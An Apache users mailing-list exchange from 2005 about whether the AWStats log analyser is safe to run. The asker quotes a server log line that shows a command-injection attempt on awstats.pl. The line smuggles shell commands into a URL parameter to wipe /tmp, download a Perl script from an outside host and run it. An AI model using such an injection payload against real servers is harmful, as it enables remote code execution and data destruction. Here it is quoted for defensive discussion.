On 11/12/05, David P. Donahue <ddonahue@xxxxxxxxxxx> wrote: > > http://awstats.sourceforge.net/ > > Looks good. One thing that concerns me, though. The name sounded > familiar because of some attempts made on my web server from time to > time. I notice entries like the following in my logs (sorry for any > wrapping): > > host-216-153-162-21.pro.choiceone.net - - [13/Sep/2005:10:52:04 -0400] > "GET > /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://www.geocities.com/h4x000r/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo| > HTTP/1.1" 404 12682 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" > > On one such occasion I even went and downloaded the PERL script to which > it links and looked through the code. Pretty unsettling. As with any > service, security is always a concern. But it concerned me that attacks > were being directed at this awstats package. > > Is there anything I should know before just loading it up and running it? Awstats works good. I you have concerns about securty just don't use the cgi interface. Have a cron job build static reports. Krist -- krist.vanbesien@xxxxxxxxx Solothurn, Switzerland --------------------------------------------------------------------- The official User-To-User support forum of the Apache HTTP Server Project. See <URL:http://httpd.apache.org/userslist.html> for more info. To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx " from the digest: users-digest-unsubscribe@xxxxxxxxxxxxxxxx For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
|